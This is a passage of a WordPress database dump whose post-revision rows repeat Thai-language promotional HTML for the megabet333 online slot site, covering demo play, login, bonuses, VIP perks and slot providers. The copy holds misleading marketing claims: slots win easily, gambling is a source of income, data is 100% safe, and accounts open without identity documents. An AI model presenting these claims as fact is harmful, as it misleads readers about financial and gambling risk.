alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-29 03:32:53','2025-10-29 03:32:53','',16,'https://megabet333.biz/?p=170',0,'revision','',0),(171,3,'2025-10-29 03:32:53','2025-10-29 03:32:53','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"https://megabetauto.com/\" target=\"_blank\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"https://amb18b.com/promotion/\" target=\"_blank\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1> <p data-start=\"354\" data-end=\"699\">การทดลองเล่นสล็อต megabet กำลังกลายเป็นเทรนด์ยอดฮิตในวงการเกมพนันออนไลน์ เพราะเป็นทางเลือกที่ดีที่สุดสำหรับผู้เล่นที่อยากสัมผัสความสนุกของเกมสล็อตแบบไม่ต้องเสียเงิน ทดลองเล่นสล็อตpgฟรี คือระบบที่เปิดให้คุณเข้าเล่นเกมได้ฟรีทุกค่าย ทุกเกม โดยไม่ต้องสมัครหรือฝากเงินก่อน เหมาะสำหรับมือใหม่ที่อยากฝึกฝีมือ รวมถึงสายปั่นสล็อตที่อยากลองสูตรใหม่ ๆ ก่อนลงสนามจริง เว็บสล็อตยุคใหม่อย่างเว็บตรง API แท้จาก USA กำลังมาแรงที่สุดในตอนนี้ เพราะมีระบบที่ทันสมัย ปลอดภัย และเชื่อมต่อกับผู้ให้บริการค่ายเกมโดยตรง ทำให้ผู้เล่นได้สัมผัสประสบการณ์เหมือนเล่นสล็อตในคาสิโนต่างประเทศแท้ ๆ ไม่ว่าจะเป็นภาพ เสียง หรืออัตราการแตกของโบนัส ทุกอย่างสมจริงและได้มาตรฐานระดับโลก ใครที่ยังไม่เคยลองถือว่าพลาดมาก เพราะนี่คือโอกาสทองในการเรียนรู้ระบบสล็อตก่อนลงเดิมพันจริง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-29 03:32:53','2025-10-29 03:32:53','',16,'https://megabet333.biz/?p=171',0,'revision','',0),(173,3,'2025-10-29 03:35:39','2025-10-29 03:35:39','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p> <h2>megabet333 3 วิธีล็อกอินเว็บสล็อตแตกง่าย อันดับ 1 เปิดเร็วไม่ต้องยื่นเอกสาร</h2> <p>ง่าย ๆ ล็อกกอินเร็ว เปิดยูสกับเราไม่ยาก <b>megabet333 </b>ออกแบบระบบล็อกอินให้ใช้งานสะดวก ปลอดภัย และใช้เวลาไม่ถึงหนึ่งนาที ก็สามารถเริ่มเดิมพันได้ทันทีโดยไม่ต้องส่งเอกสารให้ยุ่งยากเหมือนเว็บทั่วไป สามารถดำเนินการง่าย ๆ แค่ 3 ขั้นตอนเท่านั้น โดยมีขั้นตอนดังต่อไปนี้ </p><ul><li><b>ล็อกอินผ่านเบอร์มือถือ </b>เพียงกรอกเบอร์โทรศัพท์ของคุณ ระบบจะส่งรหัส OTP เพื่อยืนยันตัวตนอย่างรวดเร็ว จากนั้นสามารถตั้งรหัสผ่านและเข้าสู่หน้าเกมได้ทันที เหมาะสำหรับผู้เล่นที่ต้องการความรวดเร็ว ปลอดภัย และไม่อยากจำข้อมูลซับซ้อน</li><li><b>ล็อกอินผ่านบัญชีอีเมลหรือโซเชียลมีเดีย </b>เปิดให้สมาชิกใหม่เชื่อมต่อบัญชีด้วยอีเมล หรือเข้าสู่ระบบผ่าน Facebook, Google หรือ Line ได้โดยตรง เรียกว่าแค่กดครั้งเดียวก็เข้าเล่นได้ทันที ไม่ต้องสมัครซ้ำให้เสียเวลา และยังสามารถใช้ระบบนี้ในทุกอุปกรณ์ทั้งมือถือและคอมพิวเตอร์</li><li><b>ล็อกอินอัตโนมัติผ่านระบบจำเครื่อง </b>สำหรับใครที่เล่นบ่อย ระบบจะจดจำข้อมูลการเข้าล่าสุดไว้แบบเข้ารหัส ปลอดภัยทุกครั้งที่กลับมา ไม่ต้องกรอกข้อมูลใหม่อีก ช่วยให้เริ่มเกมได้ไวกว่าเดิม เหมาะกับสายปั่นสล็อตที่ชอบความรวดเร็วต่อเนื่อง ท่านสามารถเข้าสนุกกับเราได้เลยโดยไม่ต้องเข้าหลาย ๆ รอบ หากเข้าเล่นกับเว็บของเราเป็นประจำเป็นอยู่แล้วก็สามารถเข้าและเริ่มต้นเดิมพันได้เลย </li></ul> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>เว็บสล็อตค่ายใหญ่ megabet333 โบนัสไม่จำกัด ขนให้รับแบบจัดหนักไม่มีคำว่าอั้นชัวร์</h2> <p>แจกให้จริง ๆ <b>megabet333 </b>ให้คุณรับโบนัสแบบไม่จำกัดได้เลย ขนทั้งความสนุกพร้อมข้อเสนอแบบไม่อั้นรับง่ายชัวร์เต็ม ๆ ขนความคุ้มค่ามาเสิร์ฟให้ผู้เล่นทุกคนแบบไม่มีลิมิต เริ่มตั้งแต่สมัครสมาชิกครั้งแรกก็รับได้ทันทีไม่ต้องลุ้นไม่ต้องรอแอดมินกดยืนยัน เพราะระบบออโต้ของที่นี่พร้อมแจกให้แบบเรียลไทม์เพียงล็อกอินเข้ามาก็มีโบนัสรออยู่ทุกวัน ไม่ว่าจะฝากเท่าไหร่ เล่นกี่รอบ หรืออยู่ในระดับสมาชิกใดก็สามารถเข้าร่วมโปรโมชั่นได้ทั้งหมด ไม่ต้องกลัวว่าจะหมดสิทธิ์หรือถูกจำกัดยอด โบนัสทุกแบบเปิดให้รับซ้ำได้ทุกวัน ทั้งโบนัสต้อนรับ โบนัสฝากรายวัน โบนัสคืนยอดเสีย รวมถึงกิจกรรมพิเศษในเทศกาลต่าง ๆ ที่จัดเต็มของรางวัลมูลค่าสูง ยิ่งเล่นยิ่งสะสมแต้มแลกรางวัลได้จริง ทั้งเครดิตเพิ่มของรางวัลพรีเมียมหรือสิทธิ์เข้าร่วมกิจกรรมพิเศษเฉพาะสมาชิกเท่านั้นเรียกได้ว่าทุกการเล่นของคุณมีค่าทุกวินาที</p> <h2>ดูแลระบบสมาชิกแบบ VIP ทีมงานพร้อมช่วยเหลือ ไม่มีเหวี่ยงแน่นอน </h2> <p>แน่นอนว่าความแตกต่างที่หลายคนอาจไม่รู้ของเว็บที่มีมาตรฐาน ระบบสมาชิก VIP ถูกออกแบบมาเพื่อให้ผู้เล่นได้รับสิทธิพิเศษเหนือใคร ยิ่งเล่นมาก ระดับสมาชิกก็จะสูงขึ้นตามระบบสะสมคะแนน และทุกระดับจะได้รับบริการเฉพาะตัว ไม่ว่าจะเป็นเจ้าหน้าที่ดูแลส่วนตัว โบนัสพิเศษรายเดือน หรือสิทธิ์เข้าร่วมกิจกรรมสุดเอ็กซ์คลูซีฟที่สมาชิกทั่วไปเข้าไม่ได้ อีกทั้งเรายังมีช่องทางติดต่อที่หลากหลาย ทั้งแชทสดในหน้าเว็บ Line Official และระบบช่วยเหลือผ่านแอปพลิเคชัน ทุกช่องทางตอบกลับไวภายในไม่กี่นาที ทีมงานอยู่ประจำตลอด 24 ชั่วโมง เพื่อให้ผู้เล่นมั่นใจได้ว่าไม่มีคำว่าปล่อยปัญหาทิ้งไว้ แม้แต่ผู้เล่นใหม่ที่ยังไม่คุ้นกับระบบก็ไม่ต้องกังวล เพราะทีมงานพร้อมแนะนำทุกขั้นตอน ตั้งแต่การสมัคร การฝากถอน ไปจนถึงการเลือกเกมที่เหมาะสมกับงบของคุณทุกอย่างให้คำตอบอย่างมืออาชีพ</p> <h2>สุดพิเศษ 3 ค่ายเกมน่าลอง กำเงินแค่สิบบาทก็ปั่นสล็อต\nลุ้นรวยได้เลย</h2> <p>แน่นอนว่าการสร้างรายได้หรือการลงทุนไม่ใช่เรื่องยากอย่างที่คิด เว็บของเรามีพันธมิตรที่จะทำให้ท่านได้เข้าถึงเกมต่าง ๆ ก่อนใคร แถมยังนำเสนอเกมใหม่ ๆ ที่เล่นสนุก แตกง่าย ไม่ต้องใช้เงินลงทุนสูงด้วย โดยมี 3 ค่ายเกมทำเงินที่น่าลุ้นดังต่อไปนี้ </p><h3><b>PG Slot</b></h3><p>ค่ายเกมที่ใคร ๆ ก็พูดถึงในวงการเว็บสล็อตคาสิโนต้องยกให้ pg Slot เพราะขึ้นชื่อเรื่องภาพกราฟิกสวย เพลงประกอบเร้าใจ และฟีเจอร์โบนัสที่ไม่เหมือนใคร เกมทุกเกมจากค่ายนี้ถูกออกแบบให้เล่นง่าย แต่มีรายละเอียดลึกสำหรับคนที่ชอบวางกลยุทธ์ในการหมุนสล็อต จุดเด่นของ pg Slot คือ ระบบเกมที่ลื่นไหลรองรับทุกอุปกรณ์ ทั้งมือถือและคอมพิวเตอร์ โดยไม่ต้องดาวน์โหลดแอปพลิเคชันให้ยุ่งยาก นอกจากนี้ยังมีเกมใหม่อัปเดตทุกเดือน เช่น Mahjong Ways, Lucky Neko, หรือ Treasures of Aztec ที่การันตีความฮอตทุกงวด โบนัสแตกหนักแทบทุกสปิน ใครที่ชอบแนวเกมกราฟิกแฟนตาซี หรือสายมินิมอลเล่นเพลิน ๆ รับรองว่า pg Slot คือคำตอบที่ทำให้คุณติดใจตั้งแต่ครั้งแรกที่หมุนแน่นอน</p><h3><b>XO Slot</b></h3><p>อีกหนึ่งตำนานแห่งวงการเกมสล็อตที่คอเกมรุ่นเก๋ายังพูดถึงไม่ขาดปากก็คือ XO Slot ค่ายเกมสุดคลาสสิกที่ครองใจนักเดิมพันมานาน จุดเด่นคือเล่นง่าย โบนัสเข้าบ่อย และยังคงเสน่ห์ของสล็อตในรูปแบบดั้งเดิมไว้ครบถ้วน เกมของ XO Slot ถูกออกแบบมาให้เหมาะกับทั้งมือใหม่และมืออาชีพ เพราะไม่ต้องใช้ทุนเยอะก็สามารถลุ้นรางวัลใหญ่ได้ มีระบบแจ็กพอตสุ่มที่แตกบ่อยจนถูกเรียกว่า “ค่ายสล็อตสายโชค” ไม่ว่าจะเป็นเกมฮิตอย่าง Roma, Supreme Caishen หรือ Lucky Panda ทุกเกมมีเอกลักษณ์เฉพาะตัว ทั้งภาพ เสียง และอัตราจ่ายที่คุ้มค่า เหมาะกับคนที่ชอบเล่นสล็อตแนวเรียบง่ายแต่ให้ผลตอบแทนเกินคาด เล่นเพลินแตกบ่อย ต้อง XO Slot เท่านั้น</p><h3><b>Joker Slot</b></h3><p>ถ้าพูดถึงค่ายที่รวมเกมสล็อตคาสิโนสุดมันส์ แตกแรง จัดเต็มทุกแนว ต้องไม่พลาด โจ๊กเกอร์สล็อต หรือ Joker Gaming ที่ขึ้นชื่อเรื่องโบนัสก้อนใหญ่และเกมคุณภาพระดับสากล ความพิเศษของค่ายนี้คือระบบเกมเสถียร เล่นได้ต่อเนื่องไม่มีสะดุด พร้อมด้วยฟีเจอร์ซื้อฟรีสปินสุดคุ้มที่ทำให้ผู้เล่นมีโอกาสคว้ารางวัลใหญ่โดยไม่ต้องรอนาน เกมยอดนิยมของค่ายนี้ เช่น Roma X, Queen 2, และ Joker Madness ล้วนมีรูปแบบการเล่นที่เข้าใจง่าย และโบนัสแตกไวเกินต้าน จุดเด่นอีกอย่างคือการรองรับระบบภาษาไทยเต็มรูปแบบ พร้อมโหมดทดลองเล่นฟรีสำหรับมือใหม่ ใครที่อยากสัมผัสความตื่นเต้นของเกมที่ทั้งดุดันและแจกจริง โจ๊กเกอร์สล็อตคือค่ายที่ไม่ควรพลาด เพราะที่นี่ไม่ใช่แค่เล่นเพื่อความสนุก แต่ยังเป็นแหล่งสร้างรายได้ที่คุ้มค่าทุกการสปินจริง ๆ</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>สล็อตแตกง่าย megabet333 ระบบเสถียร การให้บริการพรีเมี่ยมต่อเนื่อง 24 ชม. </h2> <p>เว็บเล่นเกมที่พร้อมให้บริการตลอด 24 ชั่วโมง <b>megabet333 </b>สนุกได้แบบเต็มที่ ออกแบบมาเพื่อให้สมาชิกทุกคนรู้สึกเหมือนอยู่ในคาสิโนจริง ทีมงานซัพพอร์ตมืออาชีพพร้อมดูแลตลอด 24 ชั่วโมง ไม่ว่าจะเป็นการแก้ปัญหาเรื่องการฝากถอน การรับโบนัส หรือคำถามทั่วไปเกี่ยวกับเกม ผู้เล่นสามารถติดต่อได้ทุกช่องทางทั้งแชทสด ไลน์ หรือระบบอีเมล ซึ่งตอบกลับไวภายในไม่กี่นาทีเท่านั้น ใช้เทคโนโลยี SSL Encryption ที่เทียบเท่ามาตรฐานเว็บคาสิโนระดับโลก ทำให้ข้อมูลของผู้เล่นทั้งหมดถูกเก็บเป็นความลับปลอดภัยจากการโจมตีและการรั่วไหลของข้อมูล 100% มีทีมเทคนิคที่คอยตรวจสอบและอัปเดตระบบให้พร้อมใช้งานอยู่เสมอ ไม่ว่าจะกลางวันหรือกลางคืน เว็บยังคงให้บริการได้แบบไม่มีหยุดพักเพื่อให้ผู้เล่นมั่นใจได้ว่าทุกการเข้าเล่นจะได้รับประสบการณ์ที่ดีที่สุดอย่างต่อเนื่อง อยากสนุกแบบราบรื่นต้องที่นี่ที่เดียว</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-29 03:35:39','2025-10-29 03:35:39','',44,'https://megabet333.biz/?p=173',0,'revision','',0),(174,3,'2025-10-29 03:35:39','2025-10-29 03:35:39','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p> <h2>megabet333 3 วิธีล็อกอินเว็บสล็อตแตกง่าย อันดับ 1 เปิดเร็วไม่ต้องยื่นเอกสาร</h2> <p>ง่าย ๆ ล็อกกอินเร็ว เปิดยูสกับเราไม่ยาก <b>megabet333 </b>ออกแบบระบบล็อกอินให้ใช้งานสะดวก ปลอดภัย และใช้เวลาไม่ถึงหนึ่งนาที ก็สามารถเริ่มเดิมพันได้ทันทีโดยไม่ต้องส่งเอกสารให้ยุ่งยากเหมือนเว็บทั่วไป สามารถดำเนินการง่าย ๆ แค่ 3 ขั้นตอนเท่านั้น โดยมีขั้นตอนดังต่อไปนี้ </p><ul><li><b>ล็อกอินผ่านเบอร์มือถือ </b>เพียงกรอกเบอร์โทรศัพท์ของคุณ ระบบจะส่งรหัส OTP เพื่อยืนยันตัวตนอย่างรวดเร็ว จากนั้นสามารถตั้งรหัสผ่านและเข้าสู่หน้าเกมได้ทันที เหมาะสำหรับผู้เล่นที่ต้องการความรวดเร็ว ปลอดภัย และไม่อยากจำข้อมูลซับซ้อน</li><li><b>ล็อกอินผ่านบัญชีอีเมลหรือโซเชียลมีเดีย </b>เปิดให้สมาชิกใหม่เชื่อมต่อบัญชีด้วยอีเมล หรือเข้าสู่ระบบผ่าน Facebook, Google หรือ Line ได้โดยตรง เรียกว่าแค่กดครั้งเดียวก็เข้าเล่นได้ทันที ไม่ต้องสมัครซ้ำให้เสียเวลา และยังสามารถใช้ระบบนี้ในทุกอุปกรณ์ทั้งมือถือและคอมพิวเตอร์</li><li><b>ล็อกอินอัตโนมัติผ่านระบบจำเครื่อง </b>สำหรับใครที่เล่นบ่อย ระบบจะจดจำข้อมูลการเข้าล่าสุดไว้แบบเข้ารหัส ปลอดภัยทุกครั้งที่กลับมา ไม่ต้องกรอกข้อมูลใหม่อีก ช่วยให้เริ่มเกมได้ไวกว่าเดิม เหมาะกับสายปั่นสล็อตที่ชอบความรวดเร็วต่อเนื่อง ท่านสามารถเข้าสนุกกับเราได้เลยโดยไม่ต้องเข้าหลาย ๆ รอบ หากเข้าเล่นกับเว็บของเราเป็นประจำเป็นอยู่แล้วก็สามารถเข้าและเริ่มต้นเดิมพันได้เลย </li></ul> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>เว็บสล็อตค่ายใหญ่ megabet333 โบนัสไม่จำกัด ขนให้รับแบบจัดหนักไม่มีคำว่าอั้นชัวร์</h2> <p>แจกให้จริง ๆ <b>megabet333 </b>ให้คุณรับโบนัสแบบไม่จำกัดได้เลย ขนทั้งความสนุกพร้อมข้อเสนอแบบไม่อั้นรับง่ายชัวร์เต็ม ๆ ขนความคุ้มค่ามาเสิร์ฟให้ผู้เล่นทุกคนแบบไม่มีลิมิต เริ่มตั้งแต่สมัครสมาชิกครั้งแรกก็รับได้ทันทีไม่ต้องลุ้นไม่ต้องรอแอดมินกดยืนยัน เพราะระบบออโต้ของที่นี่พร้อมแจกให้แบบเรียลไทม์เพียงล็อกอินเข้ามาก็มีโบนัสรออยู่ทุกวัน ไม่ว่าจะฝากเท่าไหร่ เล่นกี่รอบ หรืออยู่ในระดับสมาชิกใดก็สามารถเข้าร่วมโปรโมชั่นได้ทั้งหมด ไม่ต้องกลัวว่าจะหมดสิทธิ์หรือถูกจำกัดยอด โบนัสทุกแบบเปิดให้รับซ้ำได้ทุกวัน ทั้งโบนัสต้อนรับ โบนัสฝากรายวัน โบนัสคืนยอดเสีย รวมถึงกิจกรรมพิเศษในเทศกาลต่าง ๆ ที่จัดเต็มของรางวัลมูลค่าสูง ยิ่งเล่นยิ่งสะสมแต้มแลกรางวัลได้จริง ทั้งเครดิตเพิ่มของรางวัลพรีเมียมหรือสิทธิ์เข้าร่วมกิจกรรมพิเศษเฉพาะสมาชิกเท่านั้นเรียกได้ว่าทุกการเล่นของคุณมีค่าทุกวินาที</p> <h2>ดูแลระบบสมาชิกแบบ VIP ทีมงานพร้อมช่วยเหลือ ไม่มีเหวี่ยงแน่นอน </h2> <p>แน่นอนว่าความแตกต่างที่หลายคนอาจไม่รู้ของเว็บที่มีมาตรฐาน ระบบสมาชิก VIP ถูกออกแบบมาเพื่อให้ผู้เล่นได้รับสิทธิพิเศษเหนือใคร ยิ่งเล่นมาก ระดับสมาชิกก็จะสูงขึ้นตามระบบสะสมคะแนน และทุกระดับจะได้รับบริการเฉพาะตัว ไม่ว่าจะเป็นเจ้าหน้าที่ดูแลส่วนตัว โบนัสพิเศษรายเดือน หรือสิทธิ์เข้าร่วมกิจกรรมสุดเอ็กซ์คลูซีฟที่สมาชิกทั่วไปเข้าไม่ได้ อีกทั้งเรายังมีช่องทางติดต่อที่หลากหลาย ทั้งแชทสดในหน้าเว็บ Line Official และระบบช่วยเหลือผ่านแอปพลิเคชัน ทุกช่องทางตอบกลับไวภายในไม่กี่นาที ทีมงานอยู่ประจำตลอด 24 ชั่วโมง เพื่อให้ผู้เล่นมั่นใจได้ว่าไม่มีคำว่าปล่อยปัญหาทิ้งไว้ แม้แต่ผู้เล่นใหม่ที่ยังไม่คุ้นกับระบบก็ไม่ต้องกังวล เพราะทีมงานพร้อมแนะนำทุกขั้นตอน ตั้งแต่การสมัคร การฝากถอน ไปจนถึงการเลือกเกมที่เหมาะสมกับงบของคุณทุกอย่างให้คำตอบอย่างมืออาชีพ</p> <h2>สุดพิเศษ 3 ค่ายเกมน่าลอง กำเงินแค่สิบบาทก็ปั่นสล็อต\nลุ้นรวยได้เลย</h2> <p>แน่นอนว่าการสร้างรายได้หรือการลงทุนไม่ใช่เรื่องยากอย่างที่คิด เว็บของเรามีพันธมิตรที่จะทำให้ท่านได้เข้าถึงเกมต่าง ๆ ก่อนใคร แถมยังนำเสนอเกมใหม่ ๆ ที่เล่นสนุก แตกง่าย ไม่ต้องใช้เงินลงทุนสูงด้วย โดยมี 3 ค่ายเกมทำเงินที่น่าลุ้นดังต่อไปนี้ </p><h3><b>PG Slot</b></h3><p>ค่ายเกมที่ใคร ๆ ก็พูดถึงในวงการเว็บสล็อตคาสิโนต้องยกให้ pg Slot เพราะขึ้นชื่อเรื่องภาพกราฟิกสวย เพลงประกอบเร้าใจ และฟีเจอร์โบนัสที่ไม่เหมือนใคร เกมทุกเกมจากค่ายนี้ถูกออกแบบให้เล่นง่าย แต่มีรายละเอียดลึกสำหรับคนที่ชอบวางกลยุทธ์ในการหมุนสล็อต จุดเด่นของ pg Slot คือ ระบบเกมที่ลื่นไหลรองรับทุกอุปกรณ์ ทั้งมือถือและคอมพิวเตอร์ โดยไม่ต้องดาวน์โหลดแอปพลิเคชันให้ยุ่งยาก 